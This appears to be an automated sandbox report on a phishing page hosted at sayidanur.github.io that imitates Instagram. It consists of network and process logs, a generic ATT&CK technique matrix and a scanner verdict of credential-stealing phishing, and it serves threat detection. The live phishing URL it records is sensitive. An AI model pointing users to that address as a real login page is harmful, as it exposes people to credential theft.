    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50458 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
    Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
    Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
    Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
    Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
    Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
    Source: unknownNetwork traffic detected: HTTP traffic on port 50341 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50286
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50289
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50288
    Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50293
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50311 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50357 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50402 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50379 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50323 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
    Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50399 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
    Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50367 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50438 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50426 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50355 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50239 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50383 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50268 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50416 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50371 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50326 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50403
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50402
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50405
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50404
    Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50407
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49931 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50139 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50467 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.win@23/957@70/23
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2028,i,1631408217040939305,6486719346093369341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sayidanur.github.io/instagram.com/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4048 --field-trial-handle=2028,i,1631408217040939305,6486719346093369341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2028,i,1631408217040939305,6486719346093369341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4048 --field-trial-handle=2028,i,1631408217040939305,6486719346093369341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://sayidanur.github.io/instagram.com/100%SlashNextCredential Stealing type: Phishing & Social usering
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
    https://support.google.com0%URL Reputationsafe
    https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
    https://fontawesome.com0%URL Reputationsafe
    https://www.internalfb.com/intern/invariant/0%URL Reputationsafe
    https://stats.g.doubleclick.net/j/collect0%URL Reputationsafe
    https://apis.google.com/js/api.js0%URL Reputationsafe
    https://schema.org0%URL Reputationsafe
    https://connect.facebook.net/0%URL Reputationsafe
    https://policies.google.com/privacy0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    star-mini.c10r.facebook.com
    157.240.252.35
    truefalse
      unknown
      bg.microsoft.map.fastly.net
      199.232.214.172
      truefalse
        unknown
        sayidanur.github.io
        185.199.108.153
        truefalse
          unknown
          scontent.xx.fbcdn.net
          157.240.251.9
          truefalse
            unknown
            play.google.com
            142.250.181.238
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                unknown
                i.ytimg.com
                142.250.186.86
                truefalse
                  unknown
                  play-lh.googleusercontent.com
                  216.58.212.150
                  truefalse
                    unknown
                    facebook.com
                    157.240.0.35
                    truefalse
                      unknown
                      www.google.com
                      216.58.206.68
                      truefalse
                        unknown
                        googlehosted.l.googleusercontent.com
                        142.250.184.225
                        truefalse
                          unknown
                          fp2e7a.wpc.phicdn.net
                          192.229.221.95
                          truefalse
                            unknown
                            www.facebook.com
                            unknown
                            unknownfalse
                              unknown
                              is2-ssl.mzstatic.com
                              unknown
                              unknownfalse
                                unknown
                                play-games.googleusercontent.com
                                unknown
                                unknownfalse
                                  unknown
                                  is4-ssl.mzstatic.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    connect.facebook.net
                                    unknown
                                    unknownfalse
                                      unknown
                                      static.xx.fbcdn.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        is3-ssl.mzstatic.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          is1-ssl.mzstatic.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            is5-ssl.mzstatic.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              https://www.facebook.com/pages/create/?ref_type=registration_formfalse
                                                unknown
                                                https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/5VtnQAqNe99.jsfalse
                                                  unknown
                                                  https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0&co=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb206NDQz&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=invisible&cb=9vfd1mtb6k9gfalse
                                                    unknown
                                                    https://static.xx.fbcdn.net/rsrc.php/v3ivAx4/yo/l/en_GB/48NDuq1PGrS.jsfalse
                                                      unknown
                                                      https://www.facebook.com/?locale=ru_RUfalse
                                                        unknown
                                                        https://facebook.com/security/hsts-pixel.giffalse
                                                          unknown
                                                          https://play-lh.googleusercontent.com/Bu3S5bBEAvad3fOA-pOpNRIOOM970zCAK8IG1anxUgfrRRbvNWICtFr19O_BHZIjlo8=w526-h296-rwfalse
                                                            unknown
                                                            https://play-lh.googleusercontent.com/a/ACg8ocKuSzmnDV00ix3atEWYmyGKFuKJcfnKhu7p7TvSSbZ4nTjDyA=s32-rw-mofalse
                                                              unknown
                                                              https://play-lh.googleusercontent.com/rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rwfalse
                                                                unknown
                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/BTuEBPL3Mnd.jsfalse
                                                                  unknown
                                                                  https://play-lh.googleusercontent.com/3Fbi4a9x3z4i_xH8NrC_bSC2m3SPu7Bqj0pW68MHg6AoqCi-pfZLchig4c4DwPA-EGo=w526-h296-rwfalse
                                                                    unknown
                                                                    https://play-lh.googleusercontent.com/dl3h4f8JvKbmL4jtmqiTWof6bU6W2mKCzOmAHgdf0PUCanyZ0qQ19oXqRgn79R8qXKwV=w416-h235-rwfalse
                                                                      unknown
                                                                      https://play-lh.googleusercontent.com/jUORXw6jLupJakZVf6ZSV4SB2SWeiSKYYtqQHC5AUpNlFkqQv1yIwT2KIFEyY8QnwA8=s64-rwfalse
                                                                        unknown
                                                                        https://play.google.com/_/PlayStoreUi/data/batchexecute?rpcids=eIpeLd%2Cdi6f4%2Cw37aie&source-path=%2Fstore%2Fgames&f.sid=-4709349331996553121&bl=boq_playuiserver_20240925.10_p0&hl=ru&gl=US&authuser&soc-app=121&soc-platform=1&soc-device=1&_reqid=203233&rt=cfalse
                                                                          unknown
                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/GcgopRl4mBW.jsfalse
                                                                            unknown
                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/jJPH6iCu1HH.jsfalse
                                                                              unknown
                                                                              https://www.facebook.com/ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=4&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqMfalse
                                                                                unknown
                                                                                https://static.xx.fbcdn.net/rsrc.php/v3ijJ_4/yf/l/en_GB/BBd2uei_xHo.jsfalse
                                                                                  unknown
                                                                                  https://play-lh.googleusercontent.com/xlL2RGPKorMz9nqE1bio8ceqIRMlv9_X77ULaavTlx5NOU71SmqZTD6BYf4DYCxVBs8=s64-rwfalse
                                                                                    unknown
                                                                                    https://play-lh.googleusercontent.com/12USW7aflgz466ifDehKTnMoAep_VHxDmKJ6jEBoDZWCSefOC-ThRX14Mqe0r8KF9XCzrpMqJts=s20-rwfalse
                                                                                      unknown
                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3i6ht4/yy/l/en_GB/Td5hkdtkXX5.jsfalse
                                                                                        unknown
                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/udpNONeEc85.jsfalse
                                                                                          unknown
                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.jsfalse
                                                                                            unknown
                                                                                            https://play-lh.googleusercontent.com/rzg9wFcos31ri58r-zeMo-2JMQGhoIxiBXY8vmhtoagdE-JG78l5CUSsQ9GNuqwATQE=w526-h296-rwfalse
                                                                                              unknown
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3i_Ou4/yX/l/en_GB/UlpshyJeqkw.jsfalse
                                                                                                unknown
                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3iKG04/yD/l/en_GB/-StUlb9du6-.jsfalse
                                                                                                  unknown
                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/KO2irUskl3Y.jsfalse
                                                                                                    unknown
                                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/7QNyOKeJP6X.jsfalse
                                                                                                      unknown
                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/e3WW2lRt6d_.cssfalse
                                                                                                        unknown
                                                                                                        https://play-lh.googleusercontent.com/-2j2BAdv613PP-EaFA-H9Oczwgljn4rRgotfLmIYMLIMRp3p_bG7gQIfBCXk1m_wiRQ=w526-h296-rwfalse
                                                                                                          unknown
                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.cssfalse
                                                                                                            unknown
                                                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/Ja35YE72DAb.jsfalse
                                                                                                              unknown
                                                                                                              https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU6C7UW3q327E2vwXw4BwUx60Vo1upE4W0OE2WxO0FE662y1Qw5Mx61vw4Ugao6C0lW0ny0RE2Jw8Xwn83fw6iw4vwbS1Lw7Jw7zwtU5K&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923872902985526&__req=1&__rev=1016900551&__s=s304av%3A16ovnc%3Ahld28a&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585651&__user=0&dpr=1&jazoest=2909&lsd=AVrc04HtBzEfalse
                                                                                                                unknown
                                                                                                                https://sayidanur.github.io/instagram.com/img/insta-fav.icotrue
                                                                                                                  unknown
                                                                                                                  https://i.ytimg.com/vi/a21q6qqmc1E/hqdefault.jpgfalse
                                                                                                                    unknown
                                                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/P-sBcB8ct1C.jsfalse
                                                                                                                      unknown
                                                                                                                      https://www.facebook.com/data/manifest/false
                                                                                                                        unknown
                                                                                                                        https://play.google.com/_/PlayStoreUi/browserinfo?f.sid=-4709349331996553121&bl=boq_playuiserver_20240925.10_p0&hl=ru&gl=US&authuser&soc-app=121&soc-platform=1&soc-device=1&_reqid=3233&rt=jfalse
                                                                                                                          unknown
                                                                                                                          https://play-lh.googleusercontent.com/ayEFwVZElGwAqSC4_lBrJNCJC7ayciaky2Qp7eOJqHHLjorWDgRsa_cKepjhc0d5xg=s256-rwfalse
                                                                                                                            unknown
